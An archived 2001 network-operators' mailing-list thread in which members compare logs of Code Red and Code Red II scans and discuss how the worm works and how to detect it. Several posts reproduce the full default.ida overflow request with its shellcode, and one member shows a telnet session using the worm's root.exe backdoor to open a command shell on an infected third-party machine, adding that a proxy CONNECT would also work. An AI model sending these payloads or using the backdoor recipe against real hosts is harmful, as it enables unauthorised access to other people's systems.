I'm getting lots of hits on my home box, unfortunately. 142 since August 1 is the latest count. :-( Noticed that the GET requests look different now: 203.231.234.229 - - [05/Aug/2001:11:46:35 +1200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9 090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 404 283 "-" "-" Whereas earlier on, they looked like this: 65.192.84.7 - - [05/Aug/2001:06:51:26 +1200] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNN%u9090%u68 58%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u90 90%u8190%u00c3%u0003%u8b00% u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 330 "-" "-" -- Juha Saarinen --------- To unsubscribe from nznog, send email to majordomo(a)list.waikato.ac.nz where the body of your message reads: unsubscribe nznog
On 5 Aug 2001, at 11:53, Juha Saarinen wrote:
I'm getting lots of hits on my home box, unfortunately. 142 since August 1 is the latest count. :-(
Noticed that the GET requests look different now:
[snip] Some look different: [dan(a)dev:/var/log] $ grep -c "default.ida?X" /var/log/httpd-access.log 12 [dan(a)dev:/var/log] $ grep -c "default.ida?N" /var/log/httpd-access.log 116 [dan(a)dev:/var/log] $ grep -c "default.ida" /var/log/httpd-access.log 128 The above represents the last 24 hours EST. All hits were against the IP address, not against any known domain (i.e. the HTTP headers did not include a domain name). -- Dan Langille pgpkey - finger dan(a)unixathome.org | http://unixathome.org/finger.php --------- To unsubscribe from nznog, send email to majordomo(a)list.waikato.ac.nz where the body of your message reads: unsubscribe nznog
Juha brings up a good point here. Notice that these two strings LOOK different but the garbage (shell code) at the end is infact the same. These are afterall buffer overflow exploits which means that they fill up an input buffer so that it overflows and then insert some code to run at the end. So all the NNNNNNNN in the original exploit was doing was just taking up space in the buffer until it was overflowing and the shell code (the assembly code that runs and does the actual work) was inserted at the end. As such (and as a later email hints at) you should not have set up NNNNNNN as a trigger for your IDS. Set up a part of the shellcode instead. Do some research, it is extremly likly that the shellcode will be inserted at the exact same place in the packet regardless of what the first buffer filling text is. Hope this helps Dean On Sun, Aug 05, 2001 at 11:53:09AM +1200, Juha Saarinen wrote:
I'm getting lots of hits on my home box, unfortunately. 142 since August 1 is the latest count. :-(
Noticed that the GET requests look different now:
203.231.234.229 - - [05/Aug/2001:11:46:35 +1200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9 090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 404 283 "-" "-"
Whereas earlier on, they looked like this:
65.192.84.7 - - [05/Aug/2001:06:51:26 +1200] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNN%u9090%u68 58%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u90 90%u8190%u00c3%u0003%u8b00% u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 330 "-" "-"
-- Juha Saarinen
--------- To unsubscribe from nznog, send email to majordomo(a)list.waikato.ac.nz where the body of your message reads: unsubscribe nznog
To unsubscribe from nznog, send email to majordomo(a)list.waikato.ac.nz where the body of your message reads: unsubscribe nznog
On Sun, Aug 05, 2001 at 11:53:09AM +1200, Juha Saarinen wrote: I'm getting lots of hits on my home box, unfortunately. 142 since August 1 is the latest count. :-( Noticed that the GET requests look different now: 203.231.234.229 - - [05/Aug/2001:11:46:35 +1200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9 090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 404 283 "-" "-" Whereas earlier on, they looked like this: 65.192.84.7 - - [05/Aug/2001:06:51:26 +1200] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNN%u9090%u68 58%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u90 90%u8190%u00c3%u0003%u8b00% u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 330 "-" "-" The initial bytes are filler bytes which mean the overflow can be less precises (they are effectively nops). Attached is a hack I wrote to pull these things apart from a long file. If anyone has any really good (non-truncated) log entries, I'd me interested. --cw
On Sun, 5 Aug 2001, Chris Wedgwood wrote:
The initial bytes are filler bytes which mean the overflow can be less precises (they are effectively nops). Attached is a hack I wrote to pull these things apart from a long file.
One thing I have noticed is that the 'X' version no longer sends broken headers and rather than a 400 error, it's not getting a 404.
If anyone has any really good (non-truncated) log entries, I'd me interested.
I have fairly good logs from my two IPs. I will email them to you if you like, or something. Incidentially, the X ones outnumber the N ones, 337 to 188 as of this moment. The first X one was at 00:05:02 NZST today. Which means that varient seems to be much more active, I guess. -- Dylan Reeve - dylan(a)wibble.net "Um, yeah." --------- To unsubscribe from nznog, send email to majordomo(a)list.waikato.ac.nz where the body of your message reads: unsubscribe nznog
On Sun, Aug 05, 2001 at 10:54:47PM +1200, Dylan Reeve wrote: I have fairly good logs from my two IPs. I will email them to you if you like, or something. Sure thing... apache seems to truncate the logs to pretty much what Juha posted? Have you any more than this? --cw --------- To unsubscribe from nznog, send email to majordomo(a)list.waikato.ac.nz where the body of your message reads: unsubscribe nznog
On Sun, 5 Aug 2001, Chris Wedgwood wrote:
On Sun, Aug 05, 2001 at 10:54:47PM +1200, Dylan Reeve wrote:
I have fairly good logs from my two IPs. I will email them to you if you like, or something.
Sure thing... apache seems to truncate the logs to pretty much what Juha posted? Have you any more than this?
No only apache logs, although I believe that is all that is contained the the HTTP request itself, not sure what other traffic comes along with it. My collection however is growing at about 1 every 30 seconds. -- Dylan Reeve - dylan(a)wibble.net "Um, yeah." --------- To unsubscribe from nznog, send email to majordomo(a)list.waikato.ac.nz where the body of your message reads: unsubscribe nznog
On Sun, Aug 05, 2001 at 11:05:58PM +1200, Dylan Reeve wrote: My collection however is growing at about 1 every 30 seconds. Can you do something like: tcpdump -wflah.pcap -s2000 port 80 on the said machine and after you've collected a few such attempts email me the file? --cw --------- To unsubscribe from nznog, send email to majordomo(a)list.waikato.ac.nz where the body of your message reads: unsubscribe nznog
Dylan or me? -- Juha :: -----Original Message----- :: From: Chris Wedgwood [mailto:cw(a)f00f.org] :: Sent: Sunday, 5 August 2001 23:10 :: To: Dylan Reeve :: Cc: Juha Saarinen; nznog(a)list.waikato.ac.nz :: Subject: Re: Different Code Red? :: :: :: On Sun, Aug 05, 2001 at 11:05:58PM +1200, Dylan Reeve wrote: :: :: My collection however is growing at about 1 every 30 seconds. :: :: Can you do something like: :: :: tcpdump -wflah.pcap -s2000 port 80 :: :: on the said machine and after you've collected a few such attempts :: email me the file? :: :: :: :: :: --cw :: :: --------- To unsubscribe from nznog, send email to majordomo(a)list.waikato.ac.nz where the body of your message reads: unsubscribe nznog
On Sun, Aug 05, 2001 at 10:54:47PM +1200, Dylan Reeve wrote:
I have fairly good logs from my two IPs. I will email them to you if you like, or something.
Sure thing... apache seems to truncate the logs to pretty much what Juha posted? Have you any more than this?
We've got a counter on it at wlug.linuxcare.co.nz/codered.php; I'm facinated by this worm. There's a brief breakdown of how it works and the binary at http://www.unixwiz.net/techtips/CodeRedII.html -- 5.4 billion people haven't chosen their preferred OS yet.. --------- To unsubscribe from nznog, send email to majordomo(a)list.waikato.ac.nz where the body of your message reads: unsubscribe nznog
Incidentially, the X ones outnumber the N ones, 337 to 188 as of this moment. The first X one was at 00:05:02 NZST today. Which means that varient seems to be much more active, I guess.
It's a new worm using the same infection vector. It is a lot more aggressive, and uses the fact that machines near to itself are likely to be good places to find crackable machines. If you have a lot of customers with cracked NT boxes you'll get a lot of scans. If you have a nice C space in the middle of nowhere with no windows machines anywhere near, you might have a rather boring night. http://www.unixwiz.net/techtips/CodeRedII.html has some preliminary discussion on it and covers most of the important pieces of information. This version also copies CMD.EXE into the scripts directory and so now any infected machine is wide, wide open. Apparently there has been some discussion on NTBUGTRAQ about it. (http://slashdot.org/comments.pl?sid=01/08/05/0433219&cid=494). Place your bets how long before code Red III is around? --------- To unsubscribe from nznog, send email to majordomo(a)list.waikato.ac.nz where the body of your message reads: unsubscribe nznog
On Sun, Aug 05, 2001 at 11:39:27PM +1200, Perry Lorier wrote: It's a new worm using the same infection vector. It is a lot more aggressive, and uses the fact that machines near to itself are likely to be good places to find crackable machines. If you have a lot of customers with cracked NT boxes you'll get a lot of scans. If you have a nice C space in the middle of nowhere with no windows machines anywhere near, you might have a rather boring night. Hey, and it leaves a cool backdoor floating about. Look for recent infectors and telnet to them like such: cw:0(a)weta(cw)$ telnet x.x.x.x 80 Trying x.x.x.x... Connected to x.x.x.x. Escape character is '^]'. get /scripts/root.exe HTTP/0.9 HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Sun, 05 Aug 2001 11:39:46 GMT Content-Type: application/octet-stream Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-1999 Microsoft Corp. c:\inetpub\scripts> Cool :) Start grepping those proxy logs people for lusers attempting to do this (it won't work via a proxy anyhow, but that's no reason not to hunt down the offending luser and beat them senseless). --cw --------- To unsubscribe from nznog, send email to majordomo(a)list.waikato.ac.nz where the body of your message reads: unsubscribe nznog
On Sun, Aug 05, 2001 at 11:46:43PM +1200, Chris Wedgwood wrote: Start grepping those proxy logs people for lusers attempting to do this (it won't work via a proxy anyhow, but that's no reason not to hunt down the offending luser and beat them senseless). Actually, about 2 seconds thought will show it's trivial to make this work via a proxy, simply use CONNECT host:port ... --cw --------- To unsubscribe from nznog, send email to majordomo(a)list.waikato.ac.nz where the body of your message reads: unsubscribe nznog
It's a new worm using the same infection vector. It is a lot more aggressive, and uses the fact that machines near to itself are likely to be good places to find crackable machines. If you have a lot of customers with cracked NT boxes you'll get a lot of scans. If you have a nice C space in the middle of nowhere with no windows machines anywhere near, you might have a rather boring night.
Hey, and it leaves a cool backdoor floating about. Look for recent infectors and telnet to them like such:
Well, I wasn't going to be so blatently obvious about it :) <shnip>
Cool :)
Heh, lotsa fun ;)
Start grepping those proxy logs people for lusers attempting to do this
Hrm, good point.
(it won't work via a proxy anyhow, but that's no reason not to hunt down the offending luser and beat them senseless).
You can. Although I'm not going to give out explicit instructions how on a public mailing list :P So if you have a proxy between you and the internet it's not going to save you from people playing with your recently backdoored IIS server. -- It's all in the mind, ya know. --------- To unsubscribe from nznog, send email to majordomo(a)list.waikato.ac.nz where the body of your message reads: unsubscribe nznog
On Mon, Aug 06, 2001 at 12:20:11AM +1200, Perry Lorier wrote: You can. Although I'm not going to give out explicit instructions how on a public mailing list :P So if you have a proxy between you and the internet it's not going to save you from people playing with your recently backdoored IIS server. too late, see my next message :) Also, you _cannot_ scan for these as borked stuff like WinGate tends to use CONNECT when it doesn't need to anyhow (thus defeting proxying too). --cw --------- To unsubscribe from nznog, send email to majordomo(a)list.waikato.ac.nz where the body of your message reads: unsubscribe nznog
At 00:11 6/08/2001, Chris Wedgwood wrote:
On Mon, Aug 06, 2001 at 12:20:11AM +1200, Perry Lorier wrote:
You can. Although I'm not going to give out explicit instructions how on a public mailing list :P So if you have a proxy between you and the internet it's not going to save you from people playing with your recently backdoored IIS server.
too late, see my next message :)
Also, you _cannot_ scan for these as borked stuff like WinGate tends to use CONNECT when it doesn't need to anyhow (thus defeting proxying too).
so how hard would it be to write a cleaning agent ? even if it were a "shutdown server and leave a message 'you have been hacked, please patch your machine' " on their screen ? you could then automate cleaning out machines :) from the number of hits I am getting from korean/asian IP's it may pay for some clever cookie (joe could write it in AWK ?) to put the message in catonese/mandarin as well :) -- Steve. --------- To unsubscribe from nznog, send email to majordomo(a)list.waikato.ac.nz where the body of your message reads: unsubscribe nznog
On Mon, Aug 06, 2001 at 01:18:56AM +1200, Steve Phillips wrote: so how hard would it be to write a cleaning agent ? not hard -- it's just a matter of time :) have it download an exectuable form a know location and execute it... that executable could then apply relevant patches and reboot (since you have to write and exectable, may as well put the hard logic in there) even if it were a "shutdown server and leave a message 'you have been hacked, please patch your machine' " on their screen ? and get sued :) from the number of hits I am getting from korean/asian IP's it may pay for some clever cookie (joe could write it in AWK ?) to put the message in catonese/mandarin as well :) Nah, China officially said they weren't infected. You must be wrong :) There was a break down of infected hosts by AS last time, I expect we'll see another soon, I think 4648 and 4768 were the two worst affected ASs in NZ, about 20 odd hosts in the former and under 10 in the latter, eveyone else was single figures. Since, I assume, most NZ web-servers were set to a locale other than US English, presumably very few were defaced and went undetected for some time. --cw --------- To unsubscribe from nznog, send email to majordomo(a)list.waikato.ac.nz where the body of your message reads: unsubscribe nznog
:: There was a break down of infected hosts by AS last time, I expect :: we'll see another soon, I think 4648 and 4768 were the two worst :: affected ASs in NZ, about 20 odd hosts in the former and under 10 in :: the latter, eveyone else was single figures. Since, I :: assume, most NZ :: web-servers were set to a locale other than US English, presumably :: very few were defaced and went undetected for some time. The hits that I've logged are mostly from 203.79.x.x (219 out of 371) which is unfortunately the range my IP address is in. Kerrap! :-( -- Juha --------- To unsubscribe from nznog, send email to majordomo(a)list.waikato.ac.nz where the body of your message reads: unsubscribe nznog
Hi all I have looked on our router and am seeing upto 100 attempts per minute from Code Red Vers. II virus scanning our network looking for other machines to infect. Is anyone else seeing such a high scan rate? Can anything be done about it? Over the last 3 hours, the frequency of attempts increased by 50%. At 11:46 PM 05/08/2001 +1200, Chris Wedgwood wrote:
On Sun, Aug 05, 2001 at 11:39:27PM +1200, Perry Lorier wrote:
It's a new worm using the same infection vector. It is a lot more aggressive, and uses the fact that machines near to itself are likely to be good places to find crackable machines. If you have a lot of customers with cracked NT boxes you'll get a lot of scans. If you have a nice C space in the middle of nowhere with no windows machines anywhere near, you might have a rather boring night.
Hey, and it leaves a cool backdoor floating about. Look for recent infectors and telnet to them like such:
cw:0(a)weta(cw)$ telnet x.x.x.x 80 Trying x.x.x.x... Connected to x.x.x.x. Escape character is '^]'. get /scripts/root.exe HTTP/0.9
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Sun, 05 Aug 2001 11:39:46 GMT Content-Type: application/octet-stream Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-1999 Microsoft Corp.
c:\inetpub\scripts>
Cool :)
Start grepping those proxy logs people for lusers attempting to do this (it won't work via a proxy anyhow, but that's no reason not to hunt down the offending luser and beat them senseless).
--cw --------- To unsubscribe from nznog, send email to majordomo(a)list.waikato.ac.nz where the body of your message reads: unsubscribe nznog
Matt Law Network Engineer Voyager NZ Ltd DDI +649 4439 443 PGP Public Key available http://www.voyager.co.nz/~mat/public-key.asc --------- To unsubscribe from nznog, send email to majordomo(a)list.waikato.ac.nz where the body of your message reads: unsubscribe nznog
431 attempts so far. Is there anything ISPs (Paradise in my case) could do to filter out the damned thing? -- Juha :: -----Original Message----- :: From: owner-nznog(a)list.waikato.ac.nz :: [mailto:owner-nznog(a)list.waikato.ac.nz] On Behalf Of :: mat(a)voyager.co.nz :: Sent: Monday, 6 August 2001 12:52 :: To: nznog(a)list.waikato.ac.nz :: Subject: Re: Different Code Red? :: :: :: Hi all :: :: I have looked on our router and am seeing upto 100 attempts :: per minute from :: Code Red Vers. II virus scanning our network looking for :: other machines to :: infect. :: :: Is anyone else seeing such a high scan rate? :: :: Can anything be done about it? :: :: Over the last 3 hours, the frequency of attempts increased by 50%. :: :: :: :: :: At 11:46 PM 05/08/2001 +1200, Chris Wedgwood wrote: :: >On Sun, Aug 05, 2001 at 11:39:27PM +1200, Perry Lorier wrote: :: > :: > It's a new worm using the same infection vector. It is :: a lot more :: > aggressive, and uses the fact that machines near to itself are :: > likely to be good places to find crackable machines. :: If you have :: > a lot of customers with cracked NT boxes you'll get a lot of :: > scans. If you have a nice C space in the middle of nowhere with :: > no windows machines anywhere near, you might have a :: rather boring :: > night. :: > :: >Hey, and it leaves a cool backdoor floating about. Look for recent :: >infectors and telnet to them like such: :: > :: >cw:0(a)weta(cw)$ telnet x.x.x.x 80 :: >Trying x.x.x.x... :: >Connected to x.x.x.x. :: >Escape character is '^]'. :: >get /scripts/root.exe HTTP/0.9 :: > :: >HTTP/1.1 200 OK :: >Server: Microsoft-IIS/5.0 :: >Date: Sun, 05 Aug 2001 11:39:46 GMT :: >Content-Type: application/octet-stream :: >Microsoft Windows 2000 [Version 5.00.2195] :: >(C) Copyright 1985-1999 Microsoft Corp. :: > :: >c:\inetpub\scripts> :: > :: > :: > :: >Cool :) :: > :: >Start grepping those proxy logs people for lusers attempting to do :: >this (it won't work via a proxy anyhow, but that's no reason not to :: >hunt down the offending luser and beat them senseless). :: > :: > :: > --cw :: >--------- :: >To unsubscribe from nznog, send email to :: majordomo(a)list.waikato.ac.nz :: >where the body of your message reads: :: >unsubscribe nznog :: > :: > :: Matt Law :: Network Engineer :: Voyager NZ Ltd :: DDI +649 4439 443 :: PGP Public Key available http://www.voyager.co.nz/~mat/public-key.asc :: --------- :: To unsubscribe from nznog, send email to majordomo(a)list.waikato.ac.nz :: where the body of your message reads: :: unsubscribe nznog :: :: --------- To unsubscribe from nznog, send email to majordomo(a)list.waikato.ac.nz where the body of your message reads: unsubscribe nznog
At 12:59 PM +1200 6/8/01, Juha Saarinen wrote:
431 attempts so far.
Is there anything ISPs (Paradise in my case) could do to filter out the damned thing?
Oh! But that would be censorship!!! -- Andrew P. Gardner barcelona.com stolen, stmoritz.com stays. What's uniform about the UDRP? We could ask ICANN to send WIPO a clue, but do they have any to spare? Get active: http://www.tldlobby.com --------- To unsubscribe from nznog, send email to majordomo(a)list.waikato.ac.nz where the body of your message reads: unsubscribe nznog
489 here. Same ISP. I suppose a lot of IP's in our class A are infected? At 12:59 6/08/2001 +1200, Juha Saarinen wrote:
431 attempts so far.
Is there anything ISPs (Paradise in my case) could do to filter out the damned thing?
--
Juha
:: -----Original Message----- :: From: owner-nznog(a)list.waikato.ac.nz :: [mailto:owner-nznog(a)list.waikato.ac.nz] On Behalf Of :: mat(a)voyager.co.nz :: Sent: Monday, 6 August 2001 12:52 :: To: nznog(a)list.waikato.ac.nz :: Subject: Re: Different Code Red? :: :: :: Hi all :: :: I have looked on our router and am seeing upto 100 attempts :: per minute from :: Code Red Vers. II virus scanning our network looking for :: other machines to :: infect. :: :: Is anyone else seeing such a high scan rate? :: :: Can anything be done about it? :: :: Over the last 3 hours, the frequency of attempts increased by 50%. :: :: :: :: :: At 11:46 PM 05/08/2001 +1200, Chris Wedgwood wrote: :: >On Sun, Aug 05, 2001 at 11:39:27PM +1200, Perry Lorier wrote: :: > :: > It's a new worm using the same infection vector. It is :: a lot more :: > aggressive, and uses the fact that machines near to itself are :: > likely to be good places to find crackable machines. :: If you have :: > a lot of customers with cracked NT boxes you'll get a lot of :: > scans. If you have a nice C space in the middle of nowhere with :: > no windows machines anywhere near, you might have a :: rather boring :: > night. :: > :: >Hey, and it leaves a cool backdoor floating about. Look for recent :: >infectors and telnet to them like such: :: > :: >cw:0(a)weta(cw)$ telnet x.x.x.x 80 :: >Trying x.x.x.x... :: >Connected to x.x.x.x. :: >Escape character is '^]'. :: >get /scripts/root.exe HTTP/0.9 :: > :: >HTTP/1.1 200 OK :: >Server: Microsoft-IIS/5.0 :: >Date: Sun, 05 Aug 2001 11:39:46 GMT :: >Content-Type: application/octet-stream :: >Microsoft Windows 2000 [Version 5.00.2195] :: >(C) Copyright 1985-1999 Microsoft Corp. :: > :: >c:\inetpub\scripts> :: > :: > :: > :: >Cool :) :: > :: >Start grepping those proxy logs people for lusers attempting to do :: >this (it won't work via a proxy anyhow, but that's no reason not to :: >hunt down the offending luser and beat them senseless). :: > :: > :: > --cw :: >--------- :: >To unsubscribe from nznog, send email to :: majordomo(a)list.waikato.ac.nz :: >where the body of your message reads: :: >unsubscribe nznog :: > :: > :: Matt Law :: Network Engineer :: Voyager NZ Ltd :: DDI +649 4439 443 :: PGP Public Key available http://www.voyager.co.nz/~mat/public-key.asc :: --------- :: To unsubscribe from nznog, send email to majordomo(a)list.waikato.ac.nz :: where the body of your message reads: :: unsubscribe nznog :: ::
--------- To unsubscribe from nznog, send email to majordomo(a)list.waikato.ac.nz where the body of your message reads: unsubscribe nznog
--------- To unsubscribe from nznog, send email to majordomo(a)list.waikato.ac.nz where the body of your message reads: unsubscribe nznog
Yeah, most come from 203.79.x.x boxes. -- Juha :: -----Original Message----- :: From: Mark Foster [mailto:blakjak(a)blakjak.net] :: Sent: Monday, 6 August 2001 13:07 :: To: Juha Saarinen; nznog(a)list.waikato.ac.nz :: Subject: RE: Different Code Red? :: :: :: 489 here. Same ISP. :: I suppose a lot of IP's in our class A are infected? :: :: :: :: At 12:59 6/08/2001 +1200, Juha Saarinen wrote: :: >431 attempts so far. :: > --------- To unsubscribe from nznog, send email to majordomo(a)list.waikato.ac.nz where the body of your message reads: unsubscribe nznog
From:
I have looked on our router and am seeing upto 100 attempts per minute from Code Red Vers. II virus scanning our network looking for other machines to infect.
Is anyone else seeing such a high scan rate?
Can anything be done about it?
Over the last 3 hours, the frequency of attempts increased by 50%.
Well, you could telnet to the handy back door now installed on each attacking machine and shut it down (expect script anyone?) :-) Oh, that's right, we can't :( We're seeing about 6 attacks per hour per IP address. This has been a pretty stable level for about 18 hours. First attack by this version, ~10pm on Saturday, reached the current level by about 5pm Sunday. Aaron. --------- To unsubscribe from nznog, send email to majordomo(a)list.waikato.ac.nz where the body of your message reads: unsubscribe nznog
# cat /var/log/httpd/access_log | grep -c default.ida 371 Aaaiieee!!! -- Juha --------- To unsubscribe from nznog, send email to majordomo(a)list.waikato.ac.nz where the body of your message reads: unsubscribe nznog
On 6 Aug 2001, at 9:04, Juha Saarinen wrote:
# cat /var/log/httpd/access_log | grep -c default.ida 371
109. 73 of those since midnight. Slainte Gordon --- Gordon Findlay Manager, Information Technology Services Christchurch College of Education, PO Box 31065, Christchurch, New Zealand email: gordon.findlay(a)cce.ac.nz phone +64 3 343 7766, mobile 021 358 788 -These views are mine: the College may agree, by coincidence.- --------- To unsubscribe from nznog, send email to majordomo(a)list.waikato.ac.nz where the body of your message reads: unsubscribe nznog
At 09:34 6/08/2001 +1200, you wrote:
On 6 Aug 2001, at 9:04, Juha Saarinen wrote:
# cat /var/log/httpd/access_log | grep -c default.ida 371
109. 73 of those since midnight.
One of our servers has had 243 attempts. only 13 of those were the new version. bah.. make that 244 errrr 245.. Sigh. and they won't let me block port 80 yet.. :/ Laters, Brodie Davis P.S anyone have any ideas why my snort process keeps falling off the planet.. all the logs say is that the interface left promiscious mode..:/ --------- To unsubscribe from nznog, send email to majordomo(a)list.waikato.ac.nz where the body of your message reads: unsubscribe nznog
If anyone has any really good (non-truncated) log entries, I'd me interested.
Sun Aug 5 07:20:15 2001 ---.238.92.162 GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN N%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090% u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0
Sun Aug 5 06:34:58 2001 ---.175.176.252 GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX X%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090% u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0
100's more if you want them. ---------------------------------------------------------------------------- Tony McGregor Mail: T.McGregor(a)cs.waikato.ac.nz Department of Computer Science Phone: +64 7 838 4651 Waikato University Fax: +64 7 858 5095 Private Bag 3105 Home: +64 7 825 5040 mobile: (021)313004 Hamilton, New Zealand www: http://www.cs.waikato.ac.nz/~tonym ---------------------------------------------------------------------------- --------- To unsubscribe from nznog, send email to majordomo(a)list.waikato.ac.nz where the body of your message reads: unsubscribe nznog
participants (15)
-
Aaron Roydhouse
-
Andy Gardner
-
Brodie Davis
-
Bruce Kingsbury
-
Chris Wedgwood
-
Dan Langille
-
Dean Pemberton
-
Dylan Reeve
-
Gordon Findlay
-
Juha Saarinen
-
Mark Foster
-
mat@voyager.co.nz
-
Perry Lorier
-
Steve Phillips
-
Tony McGregor